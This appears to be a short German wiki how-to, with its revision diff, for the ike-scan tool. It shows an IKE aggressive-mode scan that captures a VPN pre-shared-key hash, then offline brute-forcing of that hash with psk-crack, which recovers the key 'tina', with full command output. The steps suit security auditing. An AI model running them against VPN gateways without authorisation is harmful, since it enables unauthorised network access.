Ike-scan: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
Zeile 2: Zeile 2:
 
*apt-get install ike-scan
 
*apt-get install ike-scan
 
=erfolgreicher Scan=
 
=erfolgreicher Scan=
*ike-scan -M 192.168.240.44
+
*ike-scan -A 10.84.252.32 -Pike.key
 
<pre>
 
<pre>
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
+
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.240.44 Notify message 14 (NO-PROPOSAL-CHOSEN)
+
10.84.252.32 Aggressive Mode Handshake returned HDR=(CKY-R=653dfd98f52029b0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_IPV4_ADDR, Value=10.84.252.32) Hash(20 bytes) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
HDR=(CKY-R=946415af1eafd7d6, msgid=24549111)
 
  
Ending ike-scan 1.9: 1 hosts scanned in 0.071 seconds (14.05 hosts/sec).  0 returned handshake; 1 returned notify
+
Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec).  1 returned handshake; 0 returned notify
 
</pre>
 
</pre>
 +
*psk-crack -b 5 ike.key
 +
<pre>
 +
Starting psk-crack [ike-scan 1.9.4] (http://www.nta-monitor.com/tools/ike-scan/)
 +
Running in brute-force cracking mode
 +
Brute force with 36 chars up to length 5 will take up to 60466176 iterations
 +
key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942
 +
Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec)
 +
</pre>
 +
 
=erfolgloser Scan=
 
=erfolgloser Scan=
 
*ike-scan -M thor.tuxmen.de
 
*ike-scan -M thor.tuxmen.de

Version vom 9. November 2017, 10:01 Uhr

Install

  • apt-get install ike-scan

erfolgreicher Scan

  • ike-scan -A 10.84.252.32 -Pike.key
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.84.252.32	Aggressive Mode Handshake returned HDR=(CKY-R=653dfd98f52029b0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_IPV4_ADDR, Value=10.84.252.32) Hash(20 bytes) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec).  1 returned handshake; 0 returned notify
  • psk-crack -b 5 ike.key
Starting psk-crack [ike-scan 1.9.4] (http://www.nta-monitor.com/tools/ike-scan/)
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations
key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942
Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec)

erfolgloser Scan

  • ike-scan -M thor.tuxmen.de
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.475 seconds (0.40 hosts/sec).  0 returned handshake; 0 returned notify

Guide